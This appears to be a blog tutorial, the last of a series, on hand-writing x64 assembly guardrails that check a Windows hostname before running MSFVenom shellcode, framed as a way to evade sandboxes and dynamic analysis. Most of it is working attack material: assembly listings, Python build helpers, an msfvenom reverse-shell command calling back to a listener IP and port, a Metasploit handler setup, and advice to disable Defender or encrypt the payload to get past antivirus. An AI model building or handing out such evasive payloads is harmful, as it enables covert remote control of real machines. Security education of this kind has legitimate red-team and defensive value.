Windows x64 Shellcoding – Part 3

The third and final part of a three-part series on Windows x64 Shellcoding, going from a basic Hello World program in Assembly to implementing guardrails in MSFVenom shellcode.

Part 1 – Assembly and WinAPIs – Hello World
Part 2 – Assembly to Shellcode – Stack Buffers and WinAPIs
Part 3 – Adding extra functionality to MSFVenom

Most shellcoding tutorials show really interesting techniques, but don’t show anything practical. So I wanted to end this series by using the material to implement something interesting: our own custom guardrails in MSFVenom shellcode.

In my experience, traditional payload development often follows the pattern below. (I’m using "shellcode" here in its traditional meaning, i.e. code that results in a shell, rather than just machine code.)

Guard rails
Process injection
Shellcode

What if we used our knowledge of Assembly to flip this behavior, so that we end up with the following?

Process injection
Guard rails
Shellcode

This is purely speculative, but I suspect it may be slightly more evasive than the traditional approach. My reasoning is that process injection is a distinctive part of a payload, and analysts may expect it to be followed by explosive, malicious behavior. If we add guardrails at the beginning of the shellcode, after the process injection has already happened, this may add an extra layer of defense against sandboxes and dynamic analysis.

My initial idea for implementing this was to have two pieces of shellcode: a custom piece that implements the guardrails, and a second piece created by MSFVenom. We could then combine them as follows:

guardrails = "\x48\x83\xec..."
msfvenom = "\xfc\x48\x83..."
shellcode = guardrails + msfvenom
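If the snippet above is read as Python 3, it is best to keep the pieces as bytes objects (b"..." literals), because shellcode is raw bytes, not text. The following is a minimal sketch that uses placeholder byte values instead of real guardrail or MSFVenom output. It joins the two pieces with the stub first, then prints the result as a C array in the same style as msfvenom -f c. The helper names combine and to_c_array are hypothetical.

```python
# Placeholder bytes only: substitute the stub extracted in part 2 and the msfvenom output.
GUARDRAILS = b"\x48\x83\xec"  # hypothetical, truncated guardrail stub
MSFVENOM = b"\xfc\x48\x83"    # hypothetical, truncated msfvenom payload


def combine(guardrails: bytes, payload: bytes) -> bytes:
    """Guardrail stub first, so execution falls straight through into the payload."""
    return guardrails + payload


def to_c_array(data: bytes, name: str = "shellcode", per_line: int = 16) -> str:
    """Format bytes as a C array, similar in style to msfvenom's -f c output."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return f"unsigned char {name}[] =\n" + "\n".join(lines) + ";"


if __name__ == "__main__":
    print(to_c_array(combine(GUARDRAILS, MSFVENOM)))
```

The order matters. The guardrail stub must not end in a ret or an exit, because the payload only runs if execution falls off the end of the stub.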

We’ve already used GetComputerNameA, so let’s use the hostname of the computer as the guardrails for the shellcode.

Attempt 1 – Conditional Jumps

My first idea was to use conditional jumps. Labels would define sections of code, and execution would jump to one of them depending on the result of comparing the output of GetComputerNameA.

    cmp    r13b, byte [r14+1]
    je     branch2

branch1:
    ; guardrails failed, do something and exit

branch2:
    ; guardrails succeeded, execute msf

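The problem, as I saw it, was that labels such as branch1 and branch2 are compiled into specific memory addresses, so this wouldn’t work once the shellcode was injected into a new process. I also thought I couldn’t use je and similar instructions, because they require labels, which left me with only jmp. (In hindsight this isn’t quite right. A je or jmp to a label inside the same shellcode is encoded as a displacement relative to the next instruction, so it is position-independent. The absolute-address problem really shows up when an address is loaded into a register, as in the next attempt.)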

Attempt 2 – Calculated Jumps

I didn’t really know what to call this, so I just called it a calculated jump. If we write our code as if it had labels, but then remove the labels, the resulting layout looks something like this:

guardrails -> jump instruction -> branch1 -> branch2

My idea for calculated jumps is to work out two distances: from the jump instruction to branch1, and from branch1 to branch2. Say the distance from the jump to branch1 is 10 bytes and the distance from branch1 to branch2 is 20 bytes. If we can get the value of the Zero Flag, we can dynamically build the offset to the correct branch.

jmp_instr_addr + distance_to_b1 + (zf * distance_to_b2)
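The formula can be checked with plain arithmetic. Below is a minimal Python sketch using the 10- and 20-byte distances from the example above and a hypothetical jump address of 0x1000. The name branch_target is illustrative and not part of any library.

```python
def branch_target(jmp_addr: int, dist_to_b1: int, dist_b1_to_b2: int, zf: int) -> int:
    """Pick a branch without a conditional jump: zf=0 -> branch1, zf=1 -> branch2."""
    if zf not in (0, 1):
        raise ValueError("zf must be 0 or 1, as produced by sete + movzx")
    return jmp_addr + dist_to_b1 + zf * dist_b1_to_b2


if __name__ == "__main__":
    JMP_ADDR = 0x1000  # hypothetical address of the jump instruction
    print(hex(branch_target(JMP_ADDR, 10, 20, 0)))  # 0x100a (branch1: guardrail failed)
    print(hex(branch_target(JMP_ADDR, 10, 20, 1)))  # 0x101e (branch2: guardrail passed)
```

Multiplying by the flag replaces the branch decision with arithmetic, so only an unconditional jump is needed at the end.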

Depending on whether the Zero Flag is 0 or 1 after the guardrail comparison, the offset from our jump instruction will lead us into either branch1 or branch2.

As an extra measure you can also add NOP sleds between each area. Personally I did this because it helps in case you end up off by one: you just land in the NOP sled. You can also align the jump offsets to multiples of 16 (I’m not sure this is important; stack alignment issues just messed me up too much).
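Here is a sketch of the padding idea, assuming each branch is assembled as its own block. Single-byte NOPs (0x90) are appended until the next block starts on a 16-byte boundary, so a jump that lands a few bytes short slides into the next block. The block contents are placeholder int3 (0xcc) bytes, and pad_to_alignment and layout are hypothetical helper names.

```python
NOP = b"\x90"  # single-byte x86 NOP


def pad_to_alignment(block: bytes, alignment: int = 16) -> bytes:
    """Append NOPs so whatever follows starts on a multiple of `alignment`."""
    padding = (-len(block)) % alignment
    return block + NOP * padding


def layout(blocks: list[bytes], alignment: int = 16) -> tuple[bytes, list[int]]:
    """Concatenate padded blocks and return the start offset of each one."""
    out = b""
    offsets = []
    for block in blocks:
        offsets.append(len(out))
        out += pad_to_alignment(block, alignment)
    return out, offsets


if __name__ == "__main__":
    # Placeholder blocks: a 13-byte jump sequence, then branch1 and branch2 bodies.
    code, offsets = layout([b"\xcc" * 13, b"\xcc" * 150, b"\xcc" * 40])
    print(offsets)  # [0, 16, 176]
```

With these placeholder sizes, the branches start 16 and 176 bytes in, which happens to match the offsets used in the listing below.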

cmp    r13b, byte [r14+1] ; compare bytes
sete   al ; al = 1 if equal (ZF set), else 0
movzx  rax, al ; zero extend al into rax
mov    rcx, 16 ; distance to branch1
mov    rbx, 160 ; distance from branch1 to branch2
imul   rbx, rax ; 0 or 1 multiplied by 160, so either 0 or 160
add    rcx, rbx ; rcx is now 16 (16+0) or 176 (16+160)
mov    rbx, $ ; absolute address of this instruction, fixed at assembly/link time
add    rbx, rcx ; rbx = target address (position + offset)

jmp    rbx ; do conditional jump with single jmp
; push rbx / ret also worked

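I was able to get this logic working when compiling as an executable, but it didn’t work as shellcode. I’m still not completely sure why, so if you know or have any solutions please let me know. My best guess is the current assembly position. mov rbx, $ stores an absolute address that is fixed when the code is assembled and linked. Once the bytes are copied somewhere else, rbx no longer points into the running code. A RIP-relative lea rbx, [rel $] may avoid that.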
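One way to see why the current assembly position matters is to model the two ways of getting it. The Python sketch below uses made-up addresses to compare two cases:

- mov rbx, $ writes an absolute address into the instruction as a 64-bit immediate.
- lea rbx, [rel $] is encoded by NASM as a displacement from the next instruction, so it resolves against wherever the bytes actually run.

Inside the EXE the absolute value stays correct for the image, which would explain why it worked there. Once the raw bytes are copied into another process, nothing fixes that value up. All names and addresses below are hypothetical.

```python
# Hypothetical addresses for illustration only.
LINK_TIME_ADDR = 0x140001000  # where the linker placed the stub inside the EXE
RUNTIME_ADDR = 0x1F0000       # where the copied bytes execute after injection
MOV_OFFSET = 0x40             # offset of the "current position" instruction in the stub
JUMP_OFFSET = 176             # 16 + 160: the branch2 case from the listing


def target_from_absolute(jump_offset: int) -> int:
    """mov rbx, $: the immediate still holds the link-time address."""
    return LINK_TIME_ADDR + MOV_OFFSET + jump_offset


def target_from_rip_relative(jump_offset: int) -> int:
    """lea rbx, [rel $]: resolved by the CPU relative to where the code runs."""
    return RUNTIME_ADDR + MOV_OFFSET + jump_offset


if __name__ == "__main__":
    print(hex(RUNTIME_ADDR + MOV_OFFSET + JUMP_OFFSET))  # 0x1f00f0, the intended target
    print(hex(target_from_absolute(JUMP_OFFSET)))        # 0x1400010f0, outside the injected buffer
    print(hex(target_from_rip_relative(JUMP_OFFSET)))    # 0x1f00f0
```

The two results always differ by exactly the distance between the link-time and run-time locations, so the absolute version only works when the code happens to run where it was linked.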

Attempt 3 – Run or Die

So finally I accepted that I couldn’t get conditional jumps working, and started thinking about other solutions. In assembly, 0 can be interpreted in two ways: as a NULL pointer or as the integer 0. Go back to our MessageBoxA example and look at the third argument, which is passed in r8. It expects a pointer to a string to display as the message box title, or alternatively NULL, in which case the default title "Error" is used. This means that if we pass 0 in this argument the call succeeds, while passing 1 hands it an invalid pointer and the process crashes. So, continuing from our progress in part 2, let’s get the guardrails working.

So we can implement our guardrails after our GetComputerNameA call and before our MessageBoxA call. I’m using r15, r13 and rax here just because of the context of the surrounding code, and I don’t have to save anything onto the stack because the values are reassigned before they are used again.

xor    r15, r15 ; used for global boolean guardrail check
xor    r13, r13 ; used for storing chars to compare to hostname
xor    rax, rax ; use as a per-char guardrail check
mov    r15, 1 ; set boolean for guardrail

First I clear the registers in case a stray higher-order bit causes problems. Next, we iterate over the hostname stored in our stack buffer one character at a time. In my example the hostname is JWIN11, so we repeat the following code six times, changing the character and the offset each time.

mov    r13b, 0x4a ; J
cmp    r13b, byte [r14+0] ; compare first byte
sete   al ; al = 1 if the comparison was equal (ZF set), else 0
movzx  rax, al ; zero extend
and    r15, rax ; r15 becomes 0 if this char didn't match (not efficient)
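Instead of hand-editing the block for every character, a small Python helper can print it. This sketch assumes the same register roles as above: r14 points at the GetComputerNameA buffer, r15 starts at 1, and rax and r13 are scratch. The function guardrail_asm and its check_terminator option are hypothetical. As written, the checks only cover the first len(hostname) bytes, so a host called JWIN11X would also pass. Setting check_terminator also compares the terminating null byte that GetComputerNameA writes.

```python
def guardrail_asm(hostname: str, check_terminator: bool = False) -> str:
    """Generate the per-character guardrail checks for `hostname` (NASM syntax)."""
    expected = hostname.encode("ascii")  # GetComputerNameA returns ANSI bytes
    if check_terminator:
        expected += b"\x00"  # also require the string to end here (no prefix matches)
    blocks = []
    for i, b in enumerate(expected):
        label = chr(b) if b else "NUL"
        blocks.append(
            f"mov    r13b, 0x{b:02x} ; {label}\n"
            f"cmp    r13b, byte [r14+{i}] ; compare byte {i}\n"
            "sete   al ; al = 1 if the bytes were equal\n"
            "movzx  rax, al ; zero extend\n"
            "and    r15, rax ; r15 becomes 0 on any mismatch"
        )
    return "\n\n".join(blocks)


if __name__ == "__main__":
    print(guardrail_asm("JWIN11"))
```

The output can be pasted between the register setup and the mov r13, r15 step.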

So if all of our checks passed, r15 should now contain 1, otherwise 0. We copy it into r13 because the code from Nytro’s blog will place the base address of the DLL into r15. However, we need 0 in r13 for the MessageBoxA call to execute successfully, so we xor the value with 1 to invert it.

mov   r13, r15
xor   r13, 1
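To sanity-check the logic before assembling it, the register arithmetic can be modelled in a few lines of Python. This is a sketch, not a translation of the real stub. The name guard_value is hypothetical, buffer stands in for the bytes at r14, and the return value is what ends up in r13 and then in r8 for MessageBoxA.

```python
def guard_value(buffer: bytes, expected: bytes) -> int:
    """Model of the guardrail registers; returns the value that reaches r13 (then r8)."""
    r15 = 1                                 # mov r15, 1
    for i, want in enumerate(expected):
        al = 1 if buffer[i] == want else 0  # cmp r13b, byte [r14+i] / sete al / movzx rax, al
        r15 &= al                           # and r15, rax
    return r15 ^ 1                          # mov r13, r15 / xor r13, 1


if __name__ == "__main__":
    print(guard_value(b"JWIN11\x00", b"JWIN11"))       # 0: NULL caption, MessageBoxA succeeds
    print(guard_value(b"DESKTOP\x00", b"JWIN11"))      # 1: invalid caption pointer, crash
    print(guard_value(b"JWIN11X\x00", b"JWIN11"))      # 0: prefix match still passes
    print(guard_value(b"JWIN11X\x00", b"JWIN11\x00"))  # 1: fails once the terminator is checked
```

The inversion at the end is what turns "all characters matched" into the NULL pointer that lets the call succeed.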

Using the method described in Nytro’s blog, we can get the base address of User32.dll, then call GetProcAddress with MessageBoxA. We should now have the address of MessageBoxA in r15.

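xor   ecx, ecx ; hWnd = NULL (shorter than mov rcx, 0, and has no null bytes)
mov   rdx, r14 ; lpText = our stack buffer from part 2
mov   r8, r13 ; lpCaption = 0 (NULL, succeeds) or 1 (invalid pointer, crashes)
xor   r9d, r9d ; uType = 0 (MB_OK)
call  r15 ; MessageBoxA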

Now, compile and extract the shellcode as we did in part 2, up to and including our latest MessageBoxA call, and append the MSFVenom shellcode after it. Our guardrails should then act as an extra layer of defense before the final shellcode executes. I’m going to use an x64 reverse shell from MSFVenom. Note that you will need to disable Defender or encrypt the shellcode to bypass AV.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.180.219 LPORT=4444 -f c
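The -f c output is a C array of \xNN escapes. If you are assembling the final buffer in Python, a sketch like the following pulls the bytes back out so they can be appended to the guardrail stub. The helper c_array_to_bytes is hypothetical, and the sample is a truncated, illustrative string in the same format, not a real payload. msfvenom can also write raw bytes directly with -f raw, which skips this step.

```python
import re

# Matches a literal backslash-x escape followed by two hex digits, e.g. \xfc
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def c_array_to_bytes(c_source: str) -> bytes:
    """Collect every \\xNN escape from msfvenom -f c output into raw bytes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(c_source))


if __name__ == "__main__":
    sample = 'unsigned char buf[] = \n"\\xfc\\x48\\x83"\n"\\xe4\\xf0";\n'  # truncated sample
    payload = c_array_to_bytes(sample)
    print(payload.hex())  # fc4883e4f0
```

Because the regex only looks for escapes, the surrounding declaration, quotes and line breaks are ignored.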

Then setup the handler in Metasploit.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.19.180.219
msf6 exploit(multi/handler) > run

Then execute the final EXE containing your guardrails and MSFVenom shellcode. If your guardrails don’t match the hostname, the EXE should just silently crash. If the hostname matches, you should see a message box appear. After selecting OK, the reverse shell should execute, followed by satisfaction.

If you’ve got this far, the best thing you can do is rewrite this to do something else. Following a tutorial is easy, implementing something new requires effort. My intention for this series was to provide an easy introduction, covering a lot of things that required extra research and weren’t covered by other tutorials, and to finish it by implementing something interesting so people can see a cool use case for learning how to do this stuff by hand.

If you learnt something cool or this helped you with something, send me BTC for beer 🙂

bc1qannme72ya2gechk2ued2f96ec6v2veyctvz7mc
